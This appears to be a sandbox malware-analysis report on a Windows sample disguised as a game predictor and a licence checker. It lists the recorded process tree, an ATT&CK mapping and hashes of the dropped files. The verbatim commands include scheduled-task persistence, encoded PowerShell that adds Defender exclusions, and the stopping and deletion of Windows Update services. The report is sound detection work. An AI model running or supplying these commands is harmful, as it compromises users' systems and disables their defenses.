schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 12 /tr "'C:\Users\Default\AppData\upfc.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4392

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Users\Default\AppData\upfc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2828

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 11 /tr "'C:\Program Files\Reference Assemblies\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3804

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 7 /tr "'C:\Users\Default\AppData\upfc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4156

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Users\Admin\Cookies\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4564

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Admin\Cookies\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:432

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\Cookies\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1400

C:\Program Files\Google\Chrome\updaterchr.exe
"C:\Program Files\Google\Chrome\updaterchr.exe"
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:1408

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAawBmACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYgBqAHEAZQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAegBnACMAPgAgAEAAKAAgADwAIwBvAHUAbgAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAaQBqACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwApACAAPAAjAG8AdgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBxAGoAYgB2ACMAPgA="
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4712

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
PID:3968

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
PID:4040

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
PID:3044

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
PID:4744

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
PID:3544

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHEAeABzAGYAIwA+ACAAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AQQBjAHQAaQBvAG4AIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACcAIgBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwARwBvAG8AZwBsAGUAXABDAGgAcgBvAG0AZQBcAHUAcABkAGEAdABlAHIAYwBoAHIALgBlAHgAZQAiACcAKQAgADwAIwBqAHAAZwBzACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAbABkAHcAbgAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAHgAcwBjACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUARwBOAEMAJwAgAC0AVQBzAGUAcgAgACcAUwB5AHMAdABlAG0AJwAgAC0AUgB1AG4ATABlAHYAZQBsACAAJwBIAGkAZwBoAGUAcwB0ACcAIAAtAEYAbwByAGMAZQAgADwAIwB4AHUAbgByACMAPgA7AA=="
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4044

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
2⤵
PID:2960

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:3724

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:3136

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:5228

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
3⤵
PID:5532

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:736

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
3⤵
PID:2108

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
3⤵
PID:212

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
3⤵
PID:1112

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
3⤵
PID:2040

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
3⤵
PID:5124

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
PID:5372

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe "auoqcamxnqvcfox"
2⤵
PID:764

C:\Windows\explorer.exe
C:\Windows\explorer.exe mydyeonmhjxuwoj0 6E3sjfZq2rJQaxvLPmXgsA4f0StS9pic9Xw++oZ1mnbMNdSoXP4ts/KtNDhUPQkUJUDxpO3xQsm1i/s1JWMxbg4CDDUjUzNRskPjZWvNKNodOgKV2HJ8tTN0QVJgDyg+2bViTlti9ZxC5n49dcOUKQgK8rh3k8SmDF6+u9ZQ5hRhwXNv/1S1TKEHJpFva5VT15ywFxRzv+p6QJjNw/L6ZZoe3/92cs2DQxDkoE3IsIzkx9TTRmCLGdVqAhSSaqD/dxmcqlkEPlABcaswUovsRsYIsGCTWr6HEYiZyJ7D/pEvdSgl4Ssys4PH64lw+2JZOaVM/fzty5GcKPqtRyNpK7JankFbnpfTgsZW486kFTNUsNs5zwDNZorPvDx2gAGPeAmMD3VJpoYpe0XydMAhRLzHJ6W6RQZdzGI5dA+Gh5wWZDZEtYZShKFmpBaV+um5kcMLDSbVP9ZXZLDDiM9tRYE2wuSLOvJ3TtZmETNg1mQn6yUVkr/FX5NRptI/LkFX7Je7OJ1OkAzeids5Xze8cxElXNgspaI/2/qqbi/zGc67qgr9HDiuGNpTUICOihg84Gy59O+gaQM4hh8RQjGhww==
2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4724

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:3496

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
1⤵
- Launches sc.exe
PID:3548

C:\Windows\system32\sc.exe
sc stop dosvc
1⤵
- Launches sc.exe
PID:1892

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
1⤵
- Modifies registry key
PID:5180

C:\Windows\system32\sc.exe
sc stop bits
1⤵
- Launches sc.exe
PID:5156

C:\Windows\system32\sc.exe
sc stop wuauserv
1⤵
- Launches sc.exe
PID:748

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
1⤵
- Modifies registry key
PID:3060

C:\Windows\system32\sc.exe
sc stop UsoSvc
1⤵
- Launches sc.exe
PID:5328

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
1⤵
- Modifies registry key
PID:5364

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
1⤵
- Modifies registry key
PID:100

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
1⤵
- Modifies registry key
PID:4696

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
1⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious behavior: EnumeratesProcesses
PID:3784

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
1⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3864

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:4328

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:2924

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Hidden Files and Directories

T1158

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

File Permissions Modification

T1222

Hidden Files and Directories

T1158

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updaterchr.exe
Filesize
4.3MB

MD5
d746334715e2b37c584b8536b93f05f5

SHA1
0ad2d02042ef1751059d795f852b1d7aecd9b573

SHA256
c726b23b31396a909a02287354c1c4f1e1d1d5f8a39c58de885a496b28d318e1

SHA512
ff211210369265b9173180f9cc17090f439d7c95d3ba05d8d9f310ddcaac805cb78d942f52487aac5d6b71d13f8464bc283d1f0422ba945f12ccb48bab2145b1

Download Submit
C:\Program Files\Google\Chrome\updaterchr.exe
Filesize
4.3MB

MD5
d746334715e2b37c584b8536b93f05f5

SHA1
0ad2d02042ef1751059d795f852b1d7aecd9b573

SHA256
c726b23b31396a909a02287354c1c4f1e1d1d5f8a39c58de885a496b28d318e1

SHA512
ff211210369265b9173180f9cc17090f439d7c95d3ba05d8d9f310ddcaac805cb78d942f52487aac5d6b71d13f8464bc283d1f0422ba945f12ccb48bab2145b1

Download Submit
C:\Program Files\Reference Assemblies\StartMenuExperienceHost.exe
Filesize
2.9MB

MD5
fe57d05617e29061012caf99b9b89dd0

SHA1
7f346c2769fcd2dcaf97fa781456ee98382e8313

SHA256
40859d0cd7804958a6dacbeb8f63aa1751c4b8792ad30e16ebe2b1c8188c8692

SHA512
17687bdc13f287d617aedaa9e2d091c2eb7dc5e36f3a744ff19899a809bcd437d63283942419ee7267b6efde848631f27ed001c69f56455d5f082b2b4cca4809

Download Submit
C:\Program Files\Reference Assemblies\StartMenuExperienceHost.exe
Filesize
2.9MB

MD5
fe57d05617e29061012caf99b9b89dd0

SHA1
7f346c2769fcd2dcaf97fa781456ee98382e8313

SHA256
40859d0cd7804958a6dacbeb8f63aa1751c4b8792ad30e16ebe2b1c8188c8692

SHA512
17687bdc13f287d617aedaa9e2d091c2eb7dc5e36f3a744ff19899a809bcd437d63283942419ee7267b6efde848631f27ed001c69f56455d5f082b2b4cca4809

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
614f88cf39eb3223246afec4bf1463b4

SHA1
74d738ee6fdada75ac1ef1645073005e3f6b6cfb

SHA256
021636a793f57f23b16356c5b84fdf0122fdcadfaba305e4df4654bfbfa442bd

SHA512
84a7151e0471e659699a15c25d9063af1975e79bb5f23de6b3bc0d3b96cd161d70ad35f6acdbc8123b38bac9918df8b202bd6f1f4ca8061919074973e6063a77

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
53e7d5ef4d119de244668b9b57da9c51

SHA1
6767a782cdec693099aa3edb361b1e34769a3a1e

SHA256
52fd66cdeb2c1eb206a7cb2f8ab91b9594caa367443d6d457aa665446bb5c760

SHA512
adc4d65f851338d90908496df691a2f1c77794bf6ac1a04adbf66c9ad481c7671d8f82d04f8d5b0f37b527e547d9e2e786f4738697787d8a3bd49766f3c0fbaf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
6a210b55aded73b2248fc6befecf97ac

SHA1
116740a92b20a51523d34f58ee4073557f15a2fa

SHA256
50b88de1425817b6d8b443056b45039c874f31624deef02fd74f91668dde808f

SHA512
f5b6746e98242c40cd9252143e1050c06cebf891d7cf76772da9c49002607afdd979b9f26399698cc46b706e7f2891a4f228a6459bea9ed09610bbde4a73620c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
6a210b55aded73b2248fc6befecf97ac

SHA1
116740a92b20a51523d34f58ee4073557f15a2fa

SHA256
50b88de1425817b6d8b443056b45039c874f31624deef02fd74f91668dde808f

SHA512
f5b6746e98242c40cd9252143e1050c06cebf891d7cf76772da9c49002607afdd979b9f26399698cc46b706e7f2891a4f228a6459bea9ed09610bbde4a73620c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
d44e59401514964be80bb7b1bd0da16e

SHA1
5ba96ba7de5189dfb5011bebd7d2348d7d907c01

SHA256
67fdcade8a8fa2b015dbfa4820fe4cd39a034b5308a51cd6e6a790b14d15e014

SHA512
656afc5a27a412b52a0e82b9067644c7a0b36b39ae9d4dcfc0fdef1fbf870195b4305f062cb4d46a999c534c0a9411945a2a985c52c1dd1bbac1be4c6351b1da

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
a9a0f16f819ee8589ee56e0088518cbf

SHA1
d36a4536f6eafb7230379905d9b1dbd2e63dee2e

SHA256
da7fc29b2719c6221c2338da6196ff5581e6f63f5e27e31d12e5bed8ab35783f

SHA512
d289b19928138e6d84fbb05baa6bf57f460f091f98460f63ed8509e81e20d59e60c39a2fb1b3cdf802d922967436f565c89fbee9b242c85231cd38d3fbaf8e08

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
61e06aa7c42c7b2a752516bcbb242cc1

SHA1
02c54f8b171ef48cad21819c20b360448418a068

SHA256
5bb0254e8f0220caab64dcc785f432820350471bfcdcb98240c3e0e71a709f5d

SHA512
03731f49999ec895370100a4dfeee674bbe5baa50d82007256e6914c323412eef8936b320d2738774758fbbfd76d4c3d391d9e144e65587eba700d98d0362346

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
5f0ddc7f3691c81ee14d17b419ba220d

SHA1
f0ef5fde8bab9d17c0b47137e014c91be888ee53

SHA256
a31805264b8b13ce4145f272cb2830728c186c46e314b48514d636866217add5

SHA512
2ce7c2a0833f581297c13dd88ccfcd36bf129d2b5d7718c52b1d67c97cbd8fc93abc085a040229a0fd712e880c690de7f6b996b0b47c46a091fabb7931be58d3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
5f0ddc7f3691c81ee14d17b419ba220d

SHA1
f0ef5fde8bab9d17c0b47137e014c91be888ee53

SHA256
a31805264b8b13ce4145f272cb2830728c186c46e314b48514d636866217add5

SHA512
2ce7c2a0833f581297c13dd88ccfcd36bf129d2b5d7718c52b1d67c97cbd8fc93abc085a040229a0fd712e880c690de7f6b996b0b47c46a091fabb7931be58d3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
bd5940f08d0be56e65e5f2aaf47c538e

SHA1
d7e31b87866e5e383ab5499da64aba50f03e8443

SHA256
2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6

SHA512
c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
bd5940f08d0be56e65e5f2aaf47c538e

SHA1
d7e31b87866e5e383ab5499da64aba50f03e8443

SHA256
2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6

SHA512
c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
5f0ddc7f3691c81ee14d17b419ba220d

SHA1
f0ef5fde8bab9d17c0b47137e014c91be888ee53

SHA256
a31805264b8b13ce4145f272cb2830728c186c46e314b48514d636866217add5

SHA512
2ce7c2a0833f581297c13dd88ccfcd36bf129d2b5d7718c52b1d67c97cbd8fc93abc085a040229a0fd712e880c690de7f6b996b0b47c46a091fabb7931be58d3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
3a6bad9528f8e23fb5c77fbd81fa28e8

SHA1
f127317c3bc6407f536c0f0600dcbcf1aabfba36

SHA256
986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05

SHA512
846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
3a6bad9528f8e23fb5c77fbd81fa28e8

SHA1
f127317c3bc6407f536c0f0600dcbcf1aabfba36

SHA256
986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05

SHA512
846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
5f0ddc7f3691c81ee14d17b419ba220d

SHA1
f0ef5fde8bab9d17c0b47137e014c91be888ee53

SHA256
a31805264b8b13ce4145f272cb2830728c186c46e314b48514d636866217add5

SHA512
2ce7c2a0833f581297c13dd88ccfcd36bf129d2b5d7718c52b1d67c97cbd8fc93abc085a040229a0fd712e880c690de7f6b996b0b47c46a091fabb7931be58d3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
5f0ddc7f3691c81ee14d17b419ba220d

SHA1
f0ef5fde8bab9d17c0b47137e014c91be888ee53

SHA256
a31805264b8b13ce4145f272cb2830728c186c46e314b48514d636866217add5

SHA512
2ce7c2a0833f581297c13dd88ccfcd36bf129d2b5d7718c52b1d67c97cbd8fc93abc085a040229a0fd712e880c690de7f6b996b0b47c46a091fabb7931be58d3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
aaaac7c68d2b7997ed502c26fd9f65c2

SHA1
7c5a3731300d672bf53c43e2f9e951c745f7fbdf

SHA256
8724dc2c3c8e8f17aeefae44a23741b1ea3b43c490fbc52fd61575ffe1cd82bb

SHA512
c526febd9430413b48bed976edd9a795793ad1f06c8ff4f6b768b4ad63f4d2f06b9da72d4fcfa7cb9530a64e2dc3554f5ad97fd0ab60129701d175f2724ef1ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\1e6f1d79-70b5-4681-b0a6-95e8ab563ff7.vbs
Filesize
741B

MD5
4b06aecf12459b6a235889d9a49aa7c8

SHA1
4ef06afae8012333dba812938d09ec087060ef05

SHA256
58b39ffa361d08eff17868739111dacc54314bbc9753485ea4dfe8e029c7c5de

SHA512
d9bd1a42f2106b1d8da639edbc85b9cfa24536882c765b4629322db2deb0eec3910d53ca8997aec62910a764d6f2a2b750e74fb74aa2da8f79ba022ca6776174

Download Submit
C:\Users\Admin\AppData\Local\Temp\BloxPredictor.bat.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\BloxPredictor.bat.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\LicenceOutput.exe
Filesize
95KB

MD5
3b3e2bc601dac2d09e1ab65f96663f91

SHA1
410bb26b72c02f167bfd56e83f2db34fe8b60419

SHA256
2bcd24986fea58a62705365eca7f83b03cdd7fc645c050ac377c81ab7bbbd387

SHA512
40d943f98846e332a11ec56eb808fc9053eadb25667c8b91e7f2f80611a0cead3ccdbb4b3e75b6538f66ee03645e35cdcfc76199b9dcc6ec2378233cc4b05bbd

Download Submit
C:\Users\Admin\AppData\Local\Temp\LicenceOutput.exe
Filesize
95KB

MD5
3b3e2bc601dac2d09e1ab65f96663f91

SHA1
410bb26b72c02f167bfd56e83f2db34fe8b60419

SHA256
2bcd24986fea58a62705365eca7f83b03cdd7fc645c050ac377c81ab7bbbd387

SHA512
40d943f98846e332a11ec56eb808fc9053eadb25667c8b91e7f2f80611a0cead3ccdbb4b3e75b6538f66ee03645e35cdcfc76199b9dcc6ec2378233cc4b05bbd

Download Submit
C:\Users\Admin\AppData\Local\Temp\f4715ea5-2595-4f25-baa4-fbde5ef5b32f.vbs
Filesize
517B

MD5
38533d6ea8f1ca16c4a70432e8c4bd6b

SHA1
eb5f2d25a7cca46117e6eca77e76e1410f80b55d

SHA256
052a0340a0e76e56c224fcb4a0234ad86a20225c823750a7aef78a6a8c98323c

SHA512
554657f7a1a99458361a7933053a24281685d2dcfa0deb7a8872d477d0fc9a0b7e8af1e5deeb32d1dc432be8706b229b0a3d2cd51300dd3575b3a8602d0c01d3

Download Submit
C:\Users\Admin\AppData\Roaming\LicenceChecker.exe
Filesize
4.3MB

MD5
d746334715e2b37c584b8536b93f05f5

SHA1
0ad2d02042ef1751059d795f852b1d7aecd9b573

SHA256
c726b23b31396a909a02287354c1c4f1e1d1d5f8a39c58de885a496b28d318e1

SHA512
ff211210369265b9173180f9cc17090f439d7c95d3ba05d8d9f310ddcaac805cb78d942f52487aac5d6b71d13f8464bc283d1f0422ba945f12ccb48bab2145b1

Download Submit
C:\Users\Admin\AppData\Roaming\LicenceChecker.exe
Filesize
4.3MB

MD5
d746334715e2b37c584b8536b93f05f5

SHA1
0ad2d02042ef1751059d795f852b1d7aecd9b573

SHA256
c726b23b31396a909a02287354c1c4f1e1d1d5f8a39c58de885a496b28d318e1

SHA512
ff211210369265b9173180f9cc17090f439d7c95d3ba05d8d9f310ddcaac805cb78d942f52487aac5d6b71d13f8464bc283d1f0422ba945f12ccb48bab2145b1

Download Submit
C:\Users\Admin\AppData\Roaming\protection1.exe
Filesize
3.2MB

MD5
da465ba2a10713d347a581be84f5ab98

SHA1
7e4eafca9ba70ee6541d2aec2e9cdbdb972c31d7

SHA256
50f4b55efddc51ccda1eb3fdb96feef5086edb1716fa2e5516120cff13cc90c9

SHA512
29375d82d2513205bc7bbac21ca7a8d2493ae789789f625959b9eecabbc516b96dcb196313595ead6ba605f37e445028623d0053d6cd21a6ce923616de554d0a

Download Submit
C:\Users\Admin\AppData\Roaming\protection1.exe
Filesize
3.2MB

MD5
da465ba2a10713d347a581be84f5ab98

SHA1
7e4eafca9ba70ee6541d2aec2e9cdbdb972c31d7

SHA256
50f4b55efddc51ccda1eb3fdb96feef5086edb1716fa2e5516120cff13cc90c9

SHA512
29375d82d2513205bc7bbac21ca7a8d2493ae789789f625959b9eecabbc516b96dcb196313595ead6ba605f37e445028623d0053d6cd21a6ce923616de554d0a

Download Submit
C:\Windows\System32\config\systemprofile\AppData\Roaming\4EDB.tmp
MD5
